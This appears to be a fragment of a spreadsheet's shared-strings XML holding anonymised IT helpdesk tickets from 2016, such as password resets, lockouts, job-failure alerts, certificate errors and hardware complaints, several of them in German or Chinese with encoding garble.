  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: friday, august 05, 2016 8:43 pm
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: amar request to reset microsoft online services password for kzeqbica.kzcjeiyd@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ kzeqbica.kzcjeiyd@gmail.com 
â€¢ first name: santrhyat 
â€¢ last name: jagthyin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</si>
  <si>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xwlcqfsr lbcqfnie not able to open purchasing.</t>
  </si>
  <si>
    <t xml:space="preserve">xwlcqfsr lbcqfnie - xwlcqfsr.lbcqfnie@gmail.com, phone: 603.  having a problem with purchasing access.  email attached addressing the issue. please contract keith to resolve.  </t>
  </si>
  <si>
    <t>xwlcqfsr lbcqfnie</t>
  </si>
  <si>
    <t>locked out on the caas application</t>
  </si>
  <si>
    <t>insert option not wrking in excel</t>
  </si>
  <si>
    <t>insert option not working in excel.</t>
  </si>
  <si>
    <t>sabufdcz rbkvlhpo</t>
  </si>
  <si>
    <t>vlinspectkiosk2 qlhmawgi sgwipoxn locked</t>
  </si>
  <si>
    <t>cant access to network drive</t>
  </si>
  <si>
    <t xml:space="preserve">please turn off eligibility for ethics for user wqinjkxs azoyklqe </t>
  </si>
  <si>
    <t>ecc qa - peer certificate rejected by chainverifier</t>
  </si>
  <si>
    <t xml:space="preserve">just found out that the eccqa certificate is not valid. below is the error we got when talking to one of the apis on ecc qa._x000D_
_x000D_
[build#:5.0.c.07][http worker [@316135430]][com.bridgex.connect.foundation.businesslogic.custom.exception.cust360businesslogicexception.&lt;init&gt;(14)], exception_x000D_
error message: error while silently connecting: org.w3c.www.protocol.http.httpexception: peer certificate rejected by chainverifier_x000D_
detailed error message: error while silently connecting: org.w3c.www.protocol.http.httpexception: peer certificate rejected by chainverifier_x000D_
web service: _x000D_
input paramdntys: _x000D_
 property : class value : class com.company.connect.b2b.dataconnectors.io.customer.customersearchinputtype_x000D_
 property : commoninput value : commoninputs [brand=kd, distchannel=, division=, language=e, maxrows=100, salesorg=, soldto=]_x000D_
 property : customerattributes value : [customerattributes [attributecode=, attributetext=, attributetype=]]_x000D_
 property : customersearch value : customersearch [customeraddress=customeraddress [city=, country=, countrylong=, district=, email=, fax=, houseno=, name2=, name3=, name4=, state=, statelong=, street=, street2=, telephone=, zipcode=], customername1=, customername2=, customerno=81889987, customertype=]_x000D_
 property : partnerrole value : []_x000D_
webserviceclient : execute() : generirtc exception_x000D_
_x000D_
please get this fixed soon as we have lot of uacyltoe hxgayczeing going on in qa and we need the qa system back on line soon. our vendors are also about to demo the new project that they completed for company to the business and since we have certificate issue, they had to postpone it. hence, please treat this as urgent and fix as soon as possible._x000D_
</t>
  </si>
  <si>
    <t>please change email address of user gncpezhx hopqcvza from @company.com to @company.com</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bk_hana_SID_62_os_dly_dp</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bk_hana_SID_62_os_dly_dp at 08/05/16 10:47:26</t>
  </si>
  <si>
    <t xml:space="preserve">ethics issue </t>
  </si>
  <si>
    <t>inc1538003 : please turn off eligibility for ethics for user wqinjkxs azoyklqe _x000D_
inc1538001 : please change email address of user gncpezhx hopqcvza from @company.com to @company.com</t>
  </si>
  <si>
    <t>mdm tool not working via citrix system</t>
  </si>
  <si>
    <t xml:space="preserve">hello team, _x000D_
could you please support with mdm issue via citrix? _x000D_
the application mdm data manager and mdm import manager does not work when trying to upload catalogs._x000D_
_x000D_
you can find the error print screen attached._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>nlrfzxsd ecibvgxr</t>
  </si>
  <si>
    <t>benefits issue</t>
  </si>
  <si>
    <t>bmhrsxlf ukatbwyi</t>
  </si>
  <si>
    <t>unable to login to skype - certificate error</t>
  </si>
  <si>
    <t>aetvprsf ewmcrqja</t>
  </si>
  <si>
    <t>xerox copier prtqx7302 will not scan to email.</t>
  </si>
  <si>
    <t>tpqhevdg zluijfwv</t>
  </si>
  <si>
    <t>ticket update on inplant_847905</t>
  </si>
  <si>
    <t>ticket (ticket_no1538972) update to anftgup nftgyair</t>
  </si>
  <si>
    <t>outlook issue : crm giving error message.</t>
  </si>
  <si>
    <t>my outlook will not open.  it is stuck with a screen showing "processing".</t>
  </si>
  <si>
    <t xml:space="preserve">mobile broad band issue : 7350 </t>
  </si>
  <si>
    <t>ap 'usa-training-room' disassociated from controller '57.81.82.962'. - controller name: company-wlc-8510-1</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sthyuraj.sektyhar@company.com_x000D_
_x000D_
alarm: ap 'usa-training-room' disassociated from controller '57.81.82.962'. - controller name: company-wlc-8510-1_x000D_
timestamp: august 5, 2016 7:07:12 am edt_x000D_
device: usa-training-room,00:16:9c:91:1e:50_x000D_
severity: critical_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">please reset my password. i did find out why it can't log on after a 24 hours time period. because when i reset my pass word i was on wi-fi. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rvdwyapu.fubjamlr@gmail.com_x000D_
_x000D_
i am locked out of password_management_tool password change because of too many attempts (my password wouldn't work) could you please re-set me_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>rvdwyapu fubjamlr</t>
  </si>
  <si>
    <t>spoof email issue</t>
  </si>
  <si>
    <t xml:space="preserve">from: ugyothfz ugrmkdhx 
sent: friday, august 05, 2016 6:52 pm
to: ed pasgryowski &lt;ucosgrfy.aeithcvp@gmail.com&gt;; rxuobtjg grcmqaxd &lt;rxuobtjg.grcmqaxd@gmail.com&gt;; tiyhum kuyiomar &lt;glnfyoqe.fexliuytreu@gmail.com&gt;; hqbxstoy mdjftxli &lt;hqbxstoy.mdjftxli@gmail.com&gt;; dfupksnr drnqjzph &lt;dfupksnr.drnqjzph@gmail.com&gt;; epilwzux qjhitbcr &lt;epilwzux.qjhitbcr@gmail.com&gt;; zarlgjes nxjvzcta &lt;zarlgjes.nxjvzcta@gmail.com&gt;; kzishqfu bmdawzoi &lt;kzishqfu.bmdawzoi@gmail.com&gt;
cc: kathght shfhyw &lt;afkstcev.utbnkyop@gmail.com&gt;; -sadmin &lt;-sadmin@company.com&gt;; hnynhsth jsuyhwssad &lt;bxspwfyo.vzystwor@gmail.com&gt;; qfrntose ivnhumzjalakrisyuhnyrtn &lt;qfrntose.ivnhumzj@gmail.com&gt;
subject: spoof email issue
hello all,
</t>
  </si>
  <si>
    <t>hqbxstoy mdjftxli</t>
  </si>
  <si>
    <t>server HostName_973 is not responding</t>
  </si>
  <si>
    <t xml:space="preserve">we are attempting to login into our tax_interface software to apply updates and server HostName_973 is not responding.  this is the second time within two weeks that we are having an issue with this server.  please advise when issue has been corrected._x000D_
</t>
  </si>
  <si>
    <t>formatar micro</t>
  </si>
  <si>
    <t>security error in reisekosten abrechnungs programdnty</t>
  </si>
  <si>
    <t>sjxhcyrq iupxtjcf</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pjxclyhs.fcniljtu@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please give full access to hmovlkyq kinawsdv and iechuoxb zcejmwsq to the following folder:_x000D_
_x000D_
\\HostName_768\teams\finance\global bank bals fy17&lt;file:///\\HostName_768\teams\finance\global%20bank%20bals%20fy17&gt;_x000D_
_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yiramdntyjqc.qtrcepsa@gmail.com_x000D_
_x000D_
hello,_x000D_
i am unable to access supply_chain_software. it will not recognize my password._x000D_
</t>
  </si>
  <si>
    <t>HostName_1132:memory usage is now 98%</t>
  </si>
  <si>
    <t xml:space="preserve">internal error: unable to find any processes._x000D_
probe 'processes' failed to start (command = processes.exe) error = (1450) insufficient system resources exist to complete the requested service.  </t>
  </si>
  <si>
    <t xml:space="preserve">company screensaver </t>
  </si>
  <si>
    <t>unable to unlock user accounts in password_management_tool id password manager</t>
  </si>
  <si>
    <t>password_management_tool problem - look at the "unlock accounts" log. this happens to each and every user</t>
  </si>
  <si>
    <t>welcome screen in the germany lobby is not working any more - please check</t>
  </si>
  <si>
    <t>hyobjnic pmvbwqfe</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lpoebzsc.grknswyo@gmail.com_x000D_
_x000D_
i was looking for pathryu etasthon on skype.  i type in his name in the search bar, and his picture shows up with robdyhr hhnght's name beside it._x000D_
nvamcrpq gkrlmxne does not show up at all.  robdyhr hhnght is no longer with company.   perhaps communications intended and sent to robdyhr hhnght are being forwarded to pat, and the settings are incorrect._x000D_
_x000D_
in any event, can you have someone look into this and correct._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">ms crm dynamics for outlook : </t>
  </si>
  <si>
    <t>ms crm dynamics for outlook : _x000D_
error : an error occurred prompting this item to ms dynamics crm</t>
  </si>
  <si>
    <t>i am a new employee and don't have access to hr_tool, benefits, ethics, and drives other than c.</t>
  </si>
  <si>
    <t xml:space="preserve">x5314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t>
  </si>
  <si>
    <t>ticket update on ticket_no0427861</t>
  </si>
  <si>
    <t xml:space="preserve">supply_chain_software password reset </t>
  </si>
  <si>
    <t>chat disconnected</t>
  </si>
  <si>
    <t>password reset for supply_chain_software</t>
  </si>
  <si>
    <t>password reset for supply_chain_software
user id : ludwidjfft</t>
  </si>
  <si>
    <t>supply_chain_software login</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ryafbthn.mijhmiles@company.com
good morning,
i am unable to log into supply_chain_software.  can you please reset my password?
ryafbthn mijhmijhmiles
leader of sales â€“ msc
ryafbthn.mijhmiles@company.com&lt;mailto:ryafbthn.mijhmiles@company.com&gt;
</t>
  </si>
  <si>
    <t>gbfdksqi whjtkilf</t>
  </si>
  <si>
    <t>pobleme mit we_combi \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>langsamer rechner \Ã¼berprÃ¼fung \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>attendance_tool is not loading in internet explorer (missing adobe flash player)</t>
  </si>
  <si>
    <t xml:space="preserve">setup new ws \kebogxzp difnjlkp </t>
  </si>
  <si>
    <t>bluetooth keybankrd defekt \dardabthyr</t>
  </si>
  <si>
    <t>sfwdqlzx sldczfjt</t>
  </si>
  <si>
    <t>erp login</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: udetjzmn.ayueswcm@gmail.com_x000D_
_x000D_
good morning_x000D_
_x000D_
can you please reset my erp login as it tells me my password is incorrect._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>probleme mit bildschirmschoner \ we91 \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>mobiltelefon defekt</t>
  </si>
  <si>
    <t xml:space="preserve">mobiltelefon gigaset m2 professional mit der durchwahl 479 _x000D_
akku  ( defekt hÃ¤lt nicht mehr lÃ¤nger wie 1 tag ) _x000D_
display ( kann man kaum noch was erkennen )_x000D_
clip defekt._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oetlgbfw.bsctrnwp@gmail.com
i am not able to login my account
i must have the wrong password
matghyuthdw is my username
dan,
welcome to s&amp;op .. i've created your user account; please use following logn credentials:
dthyan matheywtyuews
sales manager gl2
oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;
t
</t>
  </si>
  <si>
    <t>driver update</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kbdljsxf.kcmqtjgf@gmail.com_x000D_
_x000D_
hello team,_x000D_
_x000D_
can you please update the drive and graphic card for my laptop â€“ dell e5470 , let me know if you required further details._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp business objects analysis for excel - error message: add-in is not registered correctly</t>
  </si>
  <si>
    <t>_x000D_
summary:i need acces to run bex reports showing margins.  it should be the same access as qkmgtnla buraxcij &amp; pqkthilr uitfqsen_x000D_
_x000D_
also _x000D_
_x000D_
_x000D_
i also had erp business objects loaded onto my machine.  however, it does not work.  i get the following message  "the launcher is exited with error, see log file for more details.  the analysis add-in is not registered correctly"</t>
  </si>
  <si>
    <t>ich kann mein erp passwort nicht zurÃ¼ck setzten.</t>
  </si>
  <si>
    <t>ich weiÃŸ mein erp passwort nicht mehr und habe 3 fehlversuche eingegeben. bitte zurÃ¼cksetzen.</t>
  </si>
  <si>
    <t>vmware tools are not running on the server HostName_1045 which is resided on host HostName_1178</t>
  </si>
  <si>
    <t xml:space="preserve">vmware tools are not running on the server HostName_1045 which is resided on host HostName_1178, because of this backup Job_481 is failing </t>
  </si>
  <si>
    <t>new employee not able to login to system vvrtgwildj</t>
  </si>
  <si>
    <t xml:space="preserve"> user id : vvrtgwildj
name : johghajknnes wildschuetz
user logging in for the first time and getting 
error : die sicherheisdatenbank auf dem server enthÃ¤lt kein computerkonto fÃ¼r diese arbeitsstationsvertrauensstellung
error: the security database on the server does not contain a computer account for this workstation trust relationship 
computer name : efdl8111226
contact # : 
</t>
  </si>
  <si>
    <t>lhqsm518(fim production): miiserver.exe: wrong number of instances of process miiserver.exe</t>
  </si>
  <si>
    <t>lhqsm518(fim production): miiserver.exe: wrong number of instances of process miiserver.exe, expected instances gte 1 but found 0</t>
  </si>
  <si>
    <t>new email problem</t>
  </si>
  <si>
    <t xml:space="preserve">zlxcsqdg ckpojwir cannot see all his customer accounts in msd crm </t>
  </si>
  <si>
    <t>m. wilfert does not find three customers that are included in his sales plan in ms crm on the "my active accounts" view. also, he thinks he has some in the list that do not belong to him. attached his email to this ticket .</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ivohcdpw.ixcanwbm@gmail.com_x000D_
_x000D_
dear sir_x000D_
keybankrd of laptop is not working. please do the need full_x000D_
_x000D_
laptop details :_x000D_
_x000D_
dell latitude 7350 win 8.1  x64 bit_x000D_
service tag : j822362_x000D_
computer name : ainl9912382_x000D_
india branch_x000D_
_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_593 at 08/05/16 04:59:27</t>
  </si>
  <si>
    <t>telephony_software  -  status update</t>
  </si>
  <si>
    <t xml:space="preserve">telephony_software  -  automated status update
user zjcsqtdn jikyworg activated the screen saver by pressing windows + l.
gabryltkla maier (germany warehouse) were calling her, the phone was ringing and christgryta's status was changed to acd - agent not answering automatically.
by loging on again the status was remaining at acd- agent not answering.
call id.:  2175992332
as we facing that gap occationally would you please let us know if we could have the status changing back again to available automatically.
</t>
  </si>
  <si>
    <t xml:space="preserve">distributor_tool not laoding </t>
  </si>
  <si>
    <t xml:space="preserve">distributor_tool not loading </t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_467</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_467 at 08/05/16 04:38:26</t>
  </si>
  <si>
    <t>bls (beschichtungsleitstand) germany workflow error - pvd</t>
  </si>
  <si>
    <t xml:space="preserve">error message: "laufzeitfehler '94': ungÃ¼ltige verwendung von null" _x000D_
_x000D_
prompted at step: "auftragsausgang &gt; von revision freigegeben" pressing okay results in a programdnty crash._x000D_
_x000D_
error occured first time this morning 6 am cet. _x000D_
_x000D_
there is one batch at this step (von revision freigegeben) at the moment: 7320. batches after that stage in the workflow can be processed as usual, however workflow is interrupted and batches directly before critical stage can be further processed. happens only for pvd. cvd is running without any issues. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp crm(SID_39 web) sold-to accounts is saved without division. urgent</t>
  </si>
  <si>
    <t xml:space="preserve">sold-to account (81926490) is extended to null/empty division. it can't happened that sold-to account is saved without mandatory fields. this is big issue._x000D_
this issue is generating failed queue items in crm msd. please investigate how the system allowed the user to save it._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>zmcp is not working for plant_33 personnel.    review su53 - created instead of  ticket_no ticket_no0426629</t>
  </si>
  <si>
    <t>qwsjptlo hnlasbed
erp
SID_34
"printed" to jc00
spool no. 9963485
userid lynerwjgthy
if the plant code is set at plant_34, label print is successful.   when plant code is set to plant_33, error message and no output.</t>
  </si>
  <si>
    <t xml:space="preserve">der drucker fÃ¼r die ups-lapels druckt nicht richtig. </t>
  </si>
  <si>
    <t>der drucker steht am platz von wckrxovs aunsgzmd</t>
  </si>
  <si>
    <t xml:space="preserve">dock station </t>
  </si>
  <si>
    <t xml:space="preserve">dock station is not working </t>
  </si>
  <si>
    <t>ndsyovil pymzvdqa</t>
  </si>
  <si>
    <t>password reset request through password_management_tool password.</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_481 at 08/05/16 04:03:26</t>
  </si>
  <si>
    <t>cursor moving on its own while typing.</t>
  </si>
  <si>
    <t xml:space="preserve">i got the new laptop recently and cursor jumps or moves on its own, automatically, randomly while typing in windows laptop </t>
  </si>
  <si>
    <t>qxpytolu smagdipr</t>
  </si>
  <si>
    <t>unable to login the impact award login screen.</t>
  </si>
  <si>
    <t xml:space="preserve">i am unable to login the url: </t>
  </si>
  <si>
    <t>turn off telephony_software for turkey between 10:50 - 12:00 local time.</t>
  </si>
  <si>
    <t>turn off telephony_software for turkey between 10:50 - 12:00 local time due to meeting. _x000D_
approved by djpwfxzt cfkwxlmq.</t>
  </si>
  <si>
    <t>configair server in production not responding - 500 internal server error</t>
  </si>
  <si>
    <t>config air server runs into 500 internal server error._x000D_
message: "error: while trying to invoke the method java.util.list.iterator() of a null object loaded from local variable 'locallist'_x000D_
this error happens with the csscdrill model._x000D_
_x000D_
with the mill_model model configair is coming up but the model is not working. _x000D_
_x000D_
this has directly business impact for quotations.</t>
  </si>
  <si>
    <t>reset the password for obvyknzx gzvjtish on erp / production / erp</t>
  </si>
  <si>
    <t>please reset my erp password SID_34</t>
  </si>
  <si>
    <t>obvyknzx gzvjtish</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_483 at 08/05/16 03:34:26</t>
  </si>
  <si>
    <t>please reset password for user catgyhilp (ess kiosk user)</t>
  </si>
  <si>
    <t>please reset password for user catgyhilp (ess kiosk user) please email change information to coatea or whatlgp</t>
  </si>
  <si>
    <t>usdykwvf oswvlmje</t>
  </si>
  <si>
    <t>rcukxbvw pvnuqlyb</t>
  </si>
  <si>
    <t>r: finished: start of s&amp;op process</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xfdkwusj.gyklresa@gmail.com_x000D_
_x000D_
hello_x000D_
unable to sign in after java update, see the message_x000D_
_x000D_
[cid:image001.jpg@01d1eef4.8507SID_530]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>aw: SID_1 erp</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jofghyuach.nerreter@company.com_x000D_
_x000D_
hello sandrgru,_x000D_
_x000D_
please check your gui settings for SID_1. should be:_x000D_
_x000D_
[cid:image003.png@01d1eef4.09ad5380]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp &amp; business_client password blocked</t>
  </si>
  <si>
    <t xml:space="preserve">from: asfgthok topefd
sent: friday, august 05, 2016 11:19 am
to: nwfodmhc exurcwkm
subject: rad:fw: erp &amp; business_client password blocked
importance: high
hello ,
again i am facing the issue while opening the erp.
password has been blocked.
let us do needful.
best </t>
  </si>
  <si>
    <t>need teamviewer full version and visio application</t>
  </si>
  <si>
    <t>welztypu yseckbvf</t>
  </si>
  <si>
    <t>calculation of the claim amount will make a mistake.</t>
  </si>
  <si>
    <t xml:space="preserve">from: uxndyfrs vahxnfgl [mailto:uxndyfrs.vahxnfgl@gmail.com] _x000D_
sent: friday, august 05, 2016 10:53 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rad:fw: calculation of the claim amount will make a mistake._x000D_
_x000D_
hi_x000D_
_x000D_
calculation of the claim amount will make a mistake._x000D_
please fix this._x000D_
_x000D_
the total amount of money usd 2770_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>æ— æ³•ç™»é™†hr_toolè€ƒå‹¤ç³»ç»Ÿ</t>
  </si>
  <si>
    <t>æ˜¾ç¤ºjavaæ’ä»¶æ— æ³•åŠ è½½ï¼Œæ‰€éœ€ç‰ˆæœ¬1.8.0.-45æˆ–æ›´é«˜ç‰ˆæœ¬ã€‚</t>
  </si>
  <si>
    <t>erp crm complaint when is assigned generating duplicate email</t>
  </si>
  <si>
    <t xml:space="preserve">when we update the complaint with assigned status &amp;  employee responsible , system is sending duplicate emails to sales employee &amp; employee responsible. </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1148 at 08/05/16 01:15:24</t>
  </si>
  <si>
    <t>reboot lhqsm286 (patent web uacyltoe hxgaycze server) server at 11:00 pm et on 08/04.</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1141 at 08/04/16 23:45:28</t>
  </si>
  <si>
    <t>kindly refer mail-renew account for visfgthal--- vvjodav,goptijdtnsya b- vsbhyrt</t>
  </si>
  <si>
    <t>hello snhdfihytu,
kindly refer mail-renew account for visfgthal--- vvjodav,goptijdtnsya b- vsbhyrt
extn-393
jayhrt bhatyr</t>
  </si>
  <si>
    <t>SID_1 log in issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rjanhbde.owfkyjcp@gmail.com_x000D_
_x000D_
could log on to SID_1 uacyltoe hxgaycze system_x000D_
_x000D_
_x000D_
[cid:image001.png@01d1eef6.2418b6e0]_x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t>vpn è¿žæŽ¥ä¸ä¸Š</t>
  </si>
  <si>
    <t>vpnè¿žä¸ä¸Šï¼Œè¯·è½¬ç»™ è´ºæ­£å¹³ atcbvglq.bdvmuszt@gmail.com</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bkwin_HostName_770_inc</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bkwin_HostName_770_inc at 08/04/16 22:30:29</t>
  </si>
  <si>
    <t>hi it help team,  please unblock my new company device.</t>
  </si>
  <si>
    <t xml:space="preserve">from: ntydihzo aeptfbgs _x000D_
sent: friday, august 05, 2016 2:51 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: wg: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000D_
importance: high_x000D_
_x000D_
hi it help team,_x000D_
_x000D_
please unblock my new company device._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ntydihzo aeptfbgs</t>
  </si>
  <si>
    <t xml:space="preserve"> can you unblock my account so i can use outlook app?</t>
  </si>
  <si>
    <t xml:space="preserve">from: nwfodmhc exurcwkm 
sent: friday, august 05, 2016 6:32 am
to: prishry budhtya
subject: re: rak re: your mobile device has been denied access to the server via exchange activesync because of server policies.
dear prishry,
</t>
  </si>
  <si>
    <t>plant_101 value added services - one day pick route project.</t>
  </si>
  <si>
    <t>request to phase in additional vas customers. file attached with customer accounts.._x000D_
add 1 pick day in supply_chain for the customers in attached list for plant_101 only.</t>
  </si>
  <si>
    <t>please review your recent ticketing_tool tickets and let me know who modified the ethics collaboration_platform site</t>
  </si>
  <si>
    <t xml:space="preserve">from: mikhghytr wafglhdrhjop 
sent: thursday, august 04, 2016 8:50 pm
to: nwfodmhc exurcwkm
subject: rak fw: ethics collaboration_platform site
please review your recent ticketing_tool tickets and let me know who modified the ethics collaboration_platform site.  a few weeks ago i had requested a change that placed a third column of selections.  not sure who or why this was undone.
mikhghytr wafglhdrhjop
sr. manager, global ethics and compliance programdntys
from: kzbuhixt zjdmoahr 
sent: thursday, august 04, 2016 11:16 am
to: mikhghytr wafglhdrhjop &lt;azxhejvq.fyemlavd@gmail.com&gt;
subject: re: ethics collaboration_platform site
ohâ€¦â€¦??
sethdyr hdtyr
assistant general counsel â€“ compliance and real estate
global director of ethics &amp; compliance; ccep
kzbuhixt.zjdmoahr@gmail.com 
</t>
  </si>
  <si>
    <t>ç”µè„‘å¼€æœºå¼€ä¸å‡ºæ¥</t>
  </si>
  <si>
    <t>to å°è´ºï¼Œæ—©ä¸Šç”µè„‘å¼€æœºå¼€ä¸å‡ºæ¥</t>
  </si>
  <si>
    <t xml:space="preserve">from: rakthyesh ramdntythanjesh _x000D_
sent: friday, august 05, 2016 5:26 am_x000D_
to: ugyothfz ugrmkdhx_x000D_
cc: mikhghytr rhoades_x000D_
subject: ticket_no1535917-no acces to paystub and etime._x000D_
_x000D_
good morning safrgyynjit,_x000D_
_x000D_
user called to service desk and requested to expedite the case, requesting you to own the issue on priority and assist user on same._x000D_
_x000D_
_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>outlook freezing because of crm addin</t>
  </si>
  <si>
    <t>inquiry about employee- shesyhur posrt</t>
  </si>
  <si>
    <t>etime- time card update information.</t>
  </si>
  <si>
    <t>supply_chain_software account unlock and password reset</t>
  </si>
  <si>
    <t>can't login to bex analyzer through vpn - urgent</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cfzsajbe.lyejkdho@gmail.com_x000D_
_x000D_
[cid:image001.jpg@01d1eee5.c90cdd40]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>beenefits access on oneteam</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bjitvswa.yrmugfnq@gmail.com
yesterday, it helped me access some additional information on oneteam.  but i still do not have a link showing for my benefits.  i tried to search and nothing pulls up.
tgbtyim dgtalone
key account manager
bjitvswa.yrmugfnq@gmail.com&lt;mailto:beyklcmj.bgfmrltw@gmail.com&gt;
</t>
  </si>
  <si>
    <t>bjitvswa yrmugfnq</t>
  </si>
  <si>
    <t>unable to connect to HostName_776</t>
  </si>
  <si>
    <t>stehdgty jfhying called in for an issue where he and his supervisor was not able to connect to a network drive which is HostName_776.
they're doing the third shift and as per stehdgty there's only two of them who are working but in another hour there would be 5-6 more people coming.</t>
  </si>
  <si>
    <t>customer group enhanced field</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nlearzwi.ukdzstwi@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
a business decision has recently been made to view mfg_tooltion (customer classification ik) as indirect sales going forward. currently in the bex system they are classified as direct._x000D_
_x000D_
can you please modify the "cust grp 1 â€“ enhanced" field (0cust_sales__zcustgrp1) to show mfg_tooltion (customer classification ik) customers as indirect._x000D_
[cid:image001.png@01d1ee74.cc06a6a0]_x000D_
_x000D_
this field is used in several bex and hana reports (sales v plan, product management, otc billings, etc). let me know if you have any questions._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: eagvusbr.nguqityl@gmail.com
hi team,
i was going into the ess file and checking some things for the ytd and this is the screen that shows up.  this is on my report tab when i am logged into vpn.  please assist in getting this to english.
[cid:image001.jpg@01d1ee74.0a355760]
eagvusbr nguqityl
sales engineer
</t>
  </si>
  <si>
    <t>robot HostName_776 is inactive</t>
  </si>
  <si>
    <t>fw: case id [ref:_case-111121032:ref] :: others</t>
  </si>
  <si>
    <t xml:space="preserve">from: pacvbetl yptglhoe _x000D_
sent: thursday, august 04, 2016 10:59 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: amar fw: case id [ref:_case-111121032:ref] :: others_x000D_
_x000D_
please see the forwarded email below.   this looks suspicious to me and may be some sort of phishing or spamming email.  please review it and let me know if it looks legitimate and is from legitimate individuals at company.  i did not open or view any of the attachments.  _x000D_
_x000D_
i have no idea why accounts payable would be sending me an email._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>please remove user hugcadrn ixhlwdgt (ralfteimp) from palo alto quarantine</t>
  </si>
  <si>
    <t>please remove user hugcadrn ixhlwdgt (ralfteimp) from palo alto quarantine. user's pc has been replaced</t>
  </si>
  <si>
    <t>ticket update on inc1538505 to user hbmwlprq ilfvyodx</t>
  </si>
  <si>
    <t>ticket update on ticket_no0427635</t>
  </si>
  <si>
    <t>telephony_software is missing from pc</t>
  </si>
  <si>
    <t xml:space="preserve">pc received multiple windows security updates earlier, and now the telephony_software software is missing from the screen._x000D_
ran requirements check software to see that dotnet framdntyework 4.6.1 is installed on the pc._x000D_
telephony_software fails to install in the absence of dotnet 4.5.2_x000D_
used dotnet uninstaller to remove all versions, restarted pc, dotnet 4.5.2 still fails to install._x000D_
ran a repair tool to see that the pc still has dot net 4.6.1 installed._x000D_
_x000D_
need help to setup the compatible version of dotnet on the pc and help re install telephony_software 2016 r2_x000D_
_x000D_
1.checked previous cases/tickets log(cptl) : y_x000D_
2.contact number: 346 901 0696_x000D_
3.pc name: lmsl9517233_x000D_
4.os version: windows 8.1 64 bit_x000D_
5.sop exists: y/n: n_x000D_
6.steps followed: na_x000D_
7.next assignment: amerirtcas pc services_x000D_
8.reason for reassignment: need to downgrade dot net to 4.5.2 to install crm 2016 r2 client_x000D_
9.cost center: na_x000D_
</t>
  </si>
  <si>
    <t>name:mfeyouli ndobtzpw
language:
browser:microsoft internet explorer
email:mfeyouli.ndobtzpw@gmail.com
customer number:
telephone:
summary:unlock erp account for gadbpfrz unvdyask user name :boivin</t>
  </si>
  <si>
    <t>check status in purchasing</t>
  </si>
  <si>
    <t>please contact ed pasgryowski (pasgryo) about his purchasing check status.  each time he tries to view his carts the view changes and he can't see his carts.  i told him to click in change query and the show my team carts box but it seems to reset each time.</t>
  </si>
  <si>
